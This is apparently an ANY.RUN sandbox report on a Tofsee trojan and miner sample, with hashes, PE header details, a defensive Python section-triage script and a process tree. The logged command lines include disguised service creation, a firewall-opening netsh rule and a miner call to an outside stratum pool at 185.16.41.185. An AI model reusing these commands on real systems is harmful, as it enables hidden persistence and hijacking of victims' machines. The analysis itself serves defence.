General Info

File name

9acfb27a482a0ac42cd9caf72a24545c

Full analysis
https://app.any.run/tasks/bd199d60-136a-49cb-a45c-d392912a64cf
Verdict
Malicious activity
Analysis date
7/18/2019, 16:24:51
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

tofsee

trojan

miner

evasion

Indicators:

MIME:
application/x-dosexec
File info:
PE32 executable (GUI) Intel 80386, for MS Windows
MD5

9acfb27a482a0ac42cd9caf72a24545c

SHA1

b8c2d6639427c9343383ce21eff355974ea550a4

SHA256

5134552a33b485a25270b8b78068b22fb46ff20267f92f690ee31a2046b9297d

SSDEEP

6144:OqxxwoLIoklLgkgguVHkb/a3hftL4nzgvwZL:zldkl61VEb/a3BtL4nzgA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x86 en-US) (67.0.4)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Modifies exclusions in Windows Defender
  • svchost.exe (PID: 2640)
TOFSEE was detected
  • svchost.exe (PID: 2640)
Looks like application has launched a miner
  • svchost.exe (PID: 2640)
Uses SVCHOST.EXE for hidden code execution
  • svchost.exe (PID: 2640)
  • dcsovrw.exe (PID: 3824)
Application was dropped or rewritten from another process
  • dcsovrw.exe (PID: 3824)
MINER was detected
  • svchost.exe (PID: 2164)
Connects to CnC server
  • svchost.exe (PID: 2164)
Starts SC.EXE for service management
  • 9acfb27a482a0ac42cd9caf72a24545c.exe (PID: 3496)
Uses NETSH.EXE for network configuration
  • 9acfb27a482a0ac42cd9caf72a24545c.exe (PID: 3496)
Creates or modifies windows services
  • svchost.exe (PID: 2640)
Creates files in the Windows directory
  • svchost.exe (PID: 2640)
Application launched itself
  • svchost.exe (PID: 2640)
Starts CMD.EXE for commands execution
  • 9acfb27a482a0ac42cd9caf72a24545c.exe (PID: 3496)
Checks for external IP
  • svchost.exe (PID: 2640)
Executable content was dropped or overwritten
  • 9acfb27a482a0ac42cd9caf72a24545c.exe (PID: 3496)
  • cmd.exe (PID: 3464)
Executed as Windows Service
  • dcsovrw.exe (PID: 3824)

No info indicators.


Static information

TRiD
Win32 Executable MS Visual C++ (generic) | .exe | 42.2%
Win64 Executable (generic) | .exe | 37.3%
Win32 Dynamic Link Library (generic) | .dll | 8.8%
Win32 Executable (generic) | .exe | 6%
Generic Win/DOS Executable | .exe | 2.7%
EXIF
EXE
MachineType:
Intel 386 or later, and compatibles
TimeStamp:
2018:10:18 11:51:33+02:00
PEType:
PE32
LinkerVersion:
10
CodeSize:
266240
InitializedDataSize:
784896
UninitializedDataSize:
null
EntryPoint:
0x1efd2
OSVersion:
5.1
ImageVersion:
null
SubsystemVersion:
5.1
Subsystem:
Windows GUI
Summary
Architecture:
IMAGE_FILE_MACHINE_I386
Subsystem:
IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:
18-Oct-2018 09:51:33
Detected languages
Arabic - Lebanon
Debug artifacts
C:\bixunabayimowixip duyucoxabiwafa-gaxuwo.pdb
DOS Header
Magic number:
MZ
Bytes on last page of file:
0x0090
Pages in file:
0x0003
Relocations:
0x0000
Size of header:
0x0004
Min extra paragraphs:
0x0000
Max extra paragraphs:
0xFFFF
Initial SS value:
0x0000
Initial SP value:
0x00B8
Checksum:
0x0000
Initial IP value:
0x0000
Initial CS value:
0x0000
Overlay number:
0x0000
OEM identifier:
0x0000
OEM information:
0x0000
Address of NE header:
0x000000F0
PE Headers
Signature:
PE
Machine:
IMAGE_FILE_MACHINE_I386
Number of sections:
7
Time date stamp:
18-Oct-2018 09:51:33
Pointer to Symbol Table:
0x00000000
Number of symbols:
0
Size of Optional Header:
0x00E0
Characteristics
IMAGE_FILE_32BIT_MACHINE
IMAGE_FILE_EXECUTABLE_IMAGE
Sections
Name Virtual Address Virtual Size Raw Size Characteristics Entropy
.text 0x00001000 0x00040E26 0x00041000 IMAGE_SCN_CNT_CODE,IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ 6.26056
.rdata 0x00042000 0x00008577 0x00008600 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 4.98788
.data 0x0004B000 0x000AB164 0x00002600 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 1.97668
.idata 0x000F7000 0x00001BD4 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 3.78079
.vix 0x000F9000 0x00000A99 0x00000C00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 0
.rsrc 0x000FA000 0x000086CC 0x00008800 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 4.78742
.reloc 0x00103000 0x00001C37 0x00001E00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_DISCARDABLE,IMAGE_SCN_MEM_READ 4.5074
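
The section table above already contains the two things a reverser would look at first: the `.vix` section, whose name is not one a standard linker emits and whose raw bytes have entropy 0, and the `.data` section, whose VirtualSize (0xAB164) is roughly 72 times its RawSize (0x2600), i.e. a large zero-initialised tail that the code can fill at run time. The script below is an added example, not part of the ANY.RUN report: it parses the rows exactly as printed above and applies those heuristics plus a writable-and-executable check. The set of "common" section names and the two thresholds are the author's choices.

```python
"""Heuristic triage of a PE section table.

Added example for this report (not ANY.RUN code). The rows are the section table
printed above; the common-name set and thresholds are the author's choices.
"""
from typing import NamedTuple

SECTIONS_TXT = """\
.text 0x00001000 0x00040E26 0x00041000 IMAGE_SCN_CNT_CODE,IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ 6.26056
.rdata 0x00042000 0x00008577 0x00008600 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 4.98788
.data 0x0004B000 0x000AB164 0x00002600 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 1.97668
.idata 0x000F7000 0x00001BD4 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 3.78079
.vix 0x000F9000 0x00000A99 0x00000C00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 0
.rsrc 0x000FA000 0x000086CC 0x00008800 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 4.78742
.reloc 0x00103000 0x00001C37 0x00001E00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_DISCARDABLE,IMAGE_SCN_MEM_READ 4.5074
"""

# Names that MSVC/MinGW/Go normally emit; anything else deserves a look (author's list).
COMMON_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata", ".rsrc", ".reloc",
                ".bss", ".tls", ".CRT", ".xdata", ".gfids", ".00cfg"}
LOW_ENTROPY = 0.5     # bits per byte; raw data that is almost entirely one value
VSIZE_RATIO = 8.0     # VirtualSize / RawSize above this means a large uninitialised tail


class Section(NamedTuple):
    name: str
    vaddr: int
    vsize: int
    rawsize: int
    flags: frozenset
    entropy: float


def parse_sections(text: str) -> list:
    """Parse 'name vaddr vsize rawsize flag,flag,... entropy' rows as printed in the report."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        name, va, vs, rs, flags, ent = parts
        rows.append(Section(name, int(va, 16), int(vs, 16), int(rs, 16),
                            frozenset(flags.split(",")), float(ent)))
    return rows


def section_findings(sec: Section) -> list:
    """Static heuristics for one section; an empty list means nothing notable."""
    hits = []
    if sec.name not in COMMON_NAMES:
        hits.append("non-standard section name")
    if sec.rawsize > 0 and sec.entropy < LOW_ENTROPY:
        hits.append("raw data has ~zero entropy (filler or placeholder)")
    if sec.rawsize > 0 and sec.vsize / sec.rawsize > VSIZE_RATIO:
        hits.append(f"VirtualSize is {sec.vsize / sec.rawsize:.0f}x RawSize (large uninitialised tail)")
    if {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_WRITE"} <= sec.flags:
        hits.append("section is writable and executable")
    return hits


def triage_sections(text: str = SECTIONS_TXT) -> dict:
    """Map section name -> findings, omitting sections with nothing to report."""
    out = {}
    for sec in parse_sections(text):
        hits = section_findings(sec)
        if hits:
            out[sec.name] = hits
    return out


if __name__ == "__main__":
    for name, hits in triage_sections().items():
        print(name, "->", "; ".join(hits))
```

Run as-is it reports only `.data` and `.vix`; the remaining five sections pass every check, which is the point of keeping the thresholds conservative.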
Resources
1, 2, 3, 4, 5, 25, 26, 27, 117, 543, 673, 754
Imports
KERNEL32.dll
Exports
(none listed)

Processes

Total processes
59
Monitored processes
12
Malicious processes
4
Suspicious processes
0

Behavior graph

Process tree reconstructed from the parent/child relations and tags in the graph (start node first; "no specs" as in the graph):

9acfb27a482a0ac42cd9caf72a24545c.exe (PID 3496, MEDIUM)
  +- wusa.exe (PID 2072, MEDIUM, no specs)
  +- wusa.exe (PID 1984, HIGH)
  +- cmd.exe (PID 1360, HIGH)
  +- cmd.exe (PID 3464, HIGH)
  +- sc.exe (PID 700, HIGH)
  +- sc.exe (PID 3000, HIGH)
  +- sc.exe (PID 3568, HIGH)
  +- netsh.exe (PID 3264, HIGH)
dcsovrw.exe (PID 3824, SYSTEM, no specs; started as the kbexvctd service)
  +- svchost.exe (PID 2640, SYSTEM) #TOFSEE
      +- svchost.exe (PID 2164, SYSTEM) #MINER

Process information

PID
3496
CMD
"C:\Users\admin\Desktop\9acfb27a482a0ac42cd9caf72a24545c.exe"
Path
C:\Users\admin\Desktop\9acfb27a482a0ac42cd9caf72a24545c.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\desktop\9acfb27a482a0ac42cd9caf72a24545c.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wusa.exe
c:\windows\system32\mpr.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll

PID
2072
CMD
"C:\Windows\System32\wusa.exe"
Path
C:\Windows\System32\wusa.exe
Indicators
No indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
MEDIUM
Exit code
3221226540
Version:
Company
Microsoft Corporation
Description
Windows Update Standalone Installer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wusa.exe
c:\systemroot\system32\ntdll.dll

PID
1984
CMD
"C:\Windows\System32\wusa.exe"
Path
C:\Windows\System32\wusa.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Update Standalone Installer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wusa.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\dpx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll

PID
1360
CMD
cmd /C mkdir C:\Windows\system32\kbexvctd\
Path
C:\Windows\system32\cmd.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3464
CMD
cmd /C move /Y "C:\Users\admin\AppData\Local\Temp\dcsovrw.exe" C:\Windows\system32\kbexvctd\
Path
C:\Windows\system32\cmd.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
700
CMD
sc create kbexvctd binPath= "C:\Windows\system32\kbexvctd\dcsovrw.exe /d\"C:\Users\admin\Desktop\9acfb27a482a0ac42cd9caf72a24545c.exe\"" type= own start= auto DisplayName= "wifi support"
Path
C:\Windows\system32\sc.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
A tool to aid in developing services for WindowsNT
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3000
CMD
sc description kbexvctd "wifi internet conection"
Path
C:\Windows\system32\sc.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
A tool to aid in developing services for WindowsNT
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3568
CMD
sc start kbexvctd
Path
C:\Windows\system32\sc.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
A tool to aid in developing services for WindowsNT
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3824
CMD
C:\Windows\system32\kbexvctd\dcsovrw.exe /d"C:\Users\admin\Desktop\9acfb27a482a0ac42cd9caf72a24545c.exe"
Path
C:\Windows\system32\kbexvctd\dcsovrw.exe
Indicators
No indicators
Parent process
––
User
SYSTEM
Integrity Level
SYSTEM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\windows\system32\kbexvctd\dcsovrw.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\apphelp.dll

PID
2640
CMD
svchost.exe
Path
C:\Windows\system32\svchost.exe
Indicators
Parent process
dcsovrw.exe
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Host Process for Windows Services
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\svchost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\secur32.dll
c:\windows\system32\upnp.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\ssdpapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\psapi.dll
c:\windows\system32\apphelp.dll

PID
3264
CMD
netsh advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\system32\svchost.exe" enable=yes>nul
Path
C:\Windows\system32\netsh.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
1
Version:
Company
Microsoft Corporation
Description
Network Command Shell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\netsh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\rasmontr.dll
c:\windows\system32\mprapi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\mfc42u.dll
c:\windows\system32\odbc32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\odbcint.dll
c:\windows\system32\nshwfp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\slc.dll
c:\windows\system32\dhcpcmonitor.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpqec.dll
c:\windows\system32\qutil.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\wshelper.dll
c:\windows\system32\ws2help.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\nshhttp.dll
c:\windows\system32\httpapi.dll
c:\windows\system32\fwcfg.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\version.dll
c:\windows\system32\authfwcfg.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\winipsec.dll
c:\windows\system32\ifmon.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\nci.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\netiohlp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\whhelper.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\hnetmon.dll
c:\windows\system32\netshell.dll
c:\windows\system32\shell32.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rpcnsh.dll
c:\windows\system32\dot3cfg.dll
c:\windows\system32\dot3api.dll
c:\windows\system32\atl.dll
c:\windows\system32\eappcfg.dll
c:\windows\system32\onex.dll
c:\windows\system32\eappprxy.dll
c:\windows\system32\napmontr.dll
c:\windows\system32\certcli.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\nshipsec.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\activeds.dll
c:\windows\system32\adsldpc.dll
c:\windows\system32\polstore.dll
c:\windows\system32\nettrace.dll
c:\windows\system32\ndfapi.dll
c:\windows\system32\wdi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\tdh.dll
c:\windows\system32\wcnnetsh.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\p2pnetsh.dll
c:\windows\system32\p2p.dll
c:\windows\system32\p2pcollab.dll
c:\windows\system32\wlancfg.dll
c:\windows\system32\wlanhlp.dll
c:\windows\system32\wwancfg.dll
c:\windows\system32\wwapi.dll
c:\windows\system32\peerdistsh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\qagent.dll
c:\windows\system32\napipsec.dll
c:\windows\system32\tsgqec.dll
c:\windows\system32\eapqec.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\bcryptprimitives.dll

PID
2164
CMD
svchost.exe -a cryptonight-heavy -o stratum+tcp://185.16.41.185:8087 -u w1 -p x --nicehash --safe
Path
C:\Windows\system32\svchost.exe
Indicators
Parent process
svchost.exe
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Host Process for Windows Services
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\svchost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\nsi.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll
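
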